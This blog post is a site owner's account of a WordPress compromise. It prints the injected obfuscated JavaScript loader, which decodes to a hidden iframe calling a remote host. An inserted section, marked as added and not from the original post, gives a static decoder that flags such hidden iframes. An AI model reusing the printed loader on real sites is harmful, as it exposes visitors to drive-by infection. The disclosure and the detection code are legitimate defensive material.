So I have gotten rid of the last of the trojan horses that infected WordPress in the past month. Unfortunately, Sara was a victim of the battle with it. The trick was an errant JavaScript which appears to affect IE and Windows — which is why I didn’t catch onto it earlier.

I noticed vandals had taken advantage of a WordPress back door to put up some unneeded links to my site but I didn’t trust myself enough to notice this script:

< Script language=”javascript” type=”text/javascript”> var k=’? gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu431liudph1ux2Bv@ 4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@ 3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA’,t=0,h=”;while(t< =k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h); < /script>
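The script above hides its markup by adding 3 to every character code and undoing that at load time before calling document.write. As an added example (not code from the original post), the following decodes that pattern statically, without executing the suspect script, and lists the iframes it would inject; the function names and the sample on a reserved .example host are constructed for illustration.

```javascript
// Added example: decode a "charCodeAt(i) - N" loader statically (nothing is
// executed or written to a page) and report the iframes it would inject.

// Undo the per-character shift the loader applies before document.write().
function shiftDecode(encoded, shift) {
  let out = '';
  for (let i = 0; i < encoded.length; i++) {
    out += String.fromCharCode(encoded.charCodeAt(i) - shift);
  }
  return out;
}

// Pull the first string literal and the shift constant out of the source.
function extractPayload(scriptSource) {
  const shift = /charCodeAt\([^)]*\)\s*-\s*(\d+)/.exec(scriptSource);
  const literal = /var\s+\w+\s*=\s*(['"])([\s\S]*?)\1/.exec(scriptSource);
  if (!shift || !literal) return null; // not this obfuscation pattern
  return shiftDecode(literal[2], Number(shift[1]));
}

// List iframes in decoded markup; flag ones sized 0-1px or in a hidden wrapper.
function findIframes(html) {
  const wrapperHidden = /visibility\s*:\s*hidden/i.test(html);
  const findings = [];
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const attr = (name) => {
      const a = new RegExp('\\s' + name + '\\s*=\\s*["\']?([^"\'\\s>]+)', 'i').exec(m[0]);
      return a ? a[1] : null;
    };
    const tiny = (v) => v !== null && Number(v) <= 1;
    findings.push({
      src: attr('src'),
      hidden: wrapperHidden || tiny(attr('width')) || tiny(attr('height')),
    });
  }
  return findings;
}

// Constructed sample: benign markup on a reserved .example host, encoded with
// the same +3 shift so the decoder has realistic input.
const PLAIN = '<div style="visibility:hidden"><iframe src="http://constructed.example/?s=1" width=1 height=1></iframe></div>';
const ENCODED = [...PLAIN].map((c) => String.fromCharCode(c.charCodeAt(0) + 3)).join('');
const SAMPLE_SCRIPT = "var k='" + ENCODED + "',t=0,h='';while(t<=k.length-1)" +
  "{h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);";

console.log(findIframes(extractPayload(SAMPLE_SCRIPT)));
```

Run over the saved source of a theme or post, a non-null result from `extractPayload` is itself a signal worth investigating, since legitimate templates rarely shift-encode their own markup.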

IF YOU’VE VISITED MY SITE IN THE PAST MONTH AND YOU ARE ON IE ON WINDOWS YOU MAY HAVE BEEN INFECTED. CHECK THESE SITES FOR SPYWARE SOFTWARE. McAfee and Symantec make good products.

Also, this was all made possible due to a loophole in security presented by WordPress. If you close your browser or window or anything without hitting “Logout (Administrator)”, it remains logged in as Administrator no matter who accesses the “wp-admin” utility.